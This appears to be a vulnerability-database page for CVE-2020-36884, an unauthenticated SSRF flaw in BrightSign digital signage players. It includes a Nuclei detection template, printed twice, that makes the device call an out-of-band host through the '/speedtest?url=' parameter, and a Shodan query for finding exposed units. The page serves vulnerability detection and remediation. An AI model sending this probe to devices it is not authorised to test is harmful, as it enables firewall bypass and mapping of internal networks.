BrightSign Digital Signage 8.2.26 - Server-Side Request Forgery

CVE-2020-36884

Verified

Description

Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.

Severity

Medium

Exploit Probability

Published Date

August 31, 2022

Template Author

0x_akoko

CVE-2020-36884.yaml

id: CVE-2020-36884

info:
  name: BrightSign Digital Signage 8.2.26 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: medium
  description: |
    Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.
  impact: |
    Attackers can bypass firewalls and enumerate internal network hosts by forcing arbitrary HTTP requests.
  remediation: |
    Update to a version later than 8.2.26 or the latest available version.
  reference:
    - https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
    - https://www.zeroscience.mk/codes/brightsign_ssrf.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36884
  classification:
    cve-id: CVE-2020-36884
    epss-score: 0.0083
    epss-percentile: 0.52593
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"BrightSign"
  tags: cve,cve2020,ssrf,brightsign,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/speedtest?url={{interactsh-url}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: dsl
        dsl:
          - 'contains(body_1, "Downloaded")'
# digest: 4b0a00483046022100ff1bc0934648d733615222183b1a3dca4613e5bf15351790977570154498b7220221008e7dc267ed8ad7f267f62ff057356163a0e7fd14bb423f53414d21c9cb8edcc7:922c64590222798bb761d5b6d8e72950

5.0Severity

CVSS Metrics

CVE ID:

cve-2020-36884

CWE ID:

cwe-918

References

https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595 https://www.zeroscience.mk/codes/brightsign_ssrf.txt https://nvd.nist.gov/vuln/detail/CVE-2020-36884

Remediation Steps

Update to a version later than 8.2.26 or the latest available version.

Description

id: CVE-2020-36884

info:
  name: BrightSign Digital Signage 8.2.26 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: medium
  description: |
    Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.
  impact: |
    Attackers can bypass firewalls and enumerate internal network hosts by forcing arbitrary HTTP requests.
  remediation: |
    Update to a version later than 8.2.26 or the latest available version.
  reference:
    - https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
    - https://www.zeroscience.mk/codes/brightsign_ssrf.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36884
  classification:
    cve-id: CVE-2020-36884
    epss-score: 0.0083
    epss-percentile: 0.52593
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"BrightSign"
  tags: cve,cve2020,ssrf,brightsign,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/speedtest?url={{interactsh-url}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: dsl
        dsl:
          - 'contains(body_1, "Downloaded")'
# digest: 4b0a00483046022100ff1bc0934648d733615222183b1a3dca4613e5bf15351790977570154498b7220221008e7dc267ed8ad7f267f62ff057356163a0e7fd14bb423f53414d21c9cb8edcc7:922c64590222798bb761d5b6d8e72950

BrightSign Digital Signage 8.2.26 - Server-Side Request Forgery

Description

Severity

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

BrightSign Digital Signage 8.2.26 - Server-Side Request Forgery

Description

Severity

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps